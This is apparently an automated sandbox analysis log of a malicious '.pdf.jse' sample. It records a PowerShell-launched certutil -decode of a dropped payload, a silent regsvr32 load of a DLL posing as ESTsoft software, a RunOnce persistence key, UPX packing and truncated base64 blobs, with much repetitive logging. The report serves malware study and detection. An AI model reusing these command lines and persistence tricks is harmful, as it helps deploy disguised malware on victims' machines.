GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,ExitProcess,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_nor

13_2_00007FF983DABCCF

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'

Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse	String : entropy: 5.98, length: 28286394, content: "JVBERi0xLjQKJcO+CjEgMCBvYmo8PC9QYWdlcyA4NSAwIFIgL091dGxpbmVzIDE3IDAgUiAvVHlwZSAvQ2F0YWxvZz4+CmVuZG9			Go to definition
Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse	String : entropy: 5.61, length: 345890, content: "VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF			Go to definition

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Windows\System32\certutil.exe	File created: C:\ProgramData\glK7UwV.pR9a			Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll			Jump to dropped file

Source: C:\Windows\System32\certutil.exe

File created: C:\ProgramData\glK7UwV.pR9a

Jump to dropped file

Source: C:\Windows\System32\certutil.exe	File created: C:\ProgramData\glK7UwV.pR9a			Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdate	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdate	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdate	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdate	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses an obfuscated file name to hide its real file extension (double extension)

Show sources

Source: Possible double extension: pdf.jse

Static PE information: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Uses certutil -decode

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

13_2_00007FF983DABCCF

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
